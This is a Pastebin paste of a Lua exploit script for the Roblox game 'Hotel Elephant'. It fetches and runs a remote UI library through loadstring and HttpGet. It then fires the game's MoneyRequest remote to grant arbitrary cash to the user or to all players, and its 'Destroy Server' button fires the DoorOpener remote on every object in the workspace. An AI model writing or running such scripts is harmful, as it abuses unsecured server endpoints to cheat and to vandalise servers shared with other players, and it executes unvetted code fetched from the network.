Advertisement
ProScripter29

Hotel Elephant Script

Dec 9th, 2022 (edited)
588
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.29 KB | None | 0 0
  1. local GUI = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/aaaa"))()
  2.  
  3. local UI = GUI:CreateWindow("Hotel Elephant Script","Universal Hub")
  4.  
  5. local Home = UI:addPage("Main",2,true,6)
  6.  
  7. local Player = game.Players.LocalPlayer
  8.  
  9. local Amount = 100
  10.  
  11. Home:addLabel("Money Giver", "Give money to all players or give money to yourself")
  12.  
  13. Home:addTextBox("Enter Amount", "100", function(value)
  14.     if tonumber(value) then
  15.         Amount = value
  16.     end
  17. end)
  18.  
  19. Home:addButton("Give All Money", function()
  20.     for i, TargetPlayer in pairs(game.Players:GetPlayers()) do
  21.         local Table = {
  22.             [1] = false,
  23.             [2] = Amount,
  24.             [3] = "Cash",
  25.             [4] = TargetPlayer
  26.         }
  27.         game:GetService("ReplicatedStorage").MoneyRequest:FireServer(unpack(Table))
  28.     end
  29. end)
  30.  
  31. Home:addButton("Give Yourself Money", function()
  32.     local Table = {
  33.         [1] = false,
  34.         [2] = Amount,
  35.         [3] = "Cash",
  36.         [4] = Player
  37.     }
  38.     game:GetService("ReplicatedStorage").MoneyRequest:FireServer(unpack(Table))
  39. end)
  40.  
  41. Home:addButton("Destroy Server", function()
  42.     for _, Part in pairs(workspace:GetDescendants()) do
  43.         game.ReplicatedStorage.DoorOpener:FireServer(Part)
  44.     end
  45. end)
  46.  
  47. local Credits = UI:addPage("Credits",1,false,6)
  48.  
  49. Credits:addLabel("Credits", "Hud created by HappyH0lidays2021")
Advertisement
Comments
Add Comment
Please, Sign In to add comment
Advertisement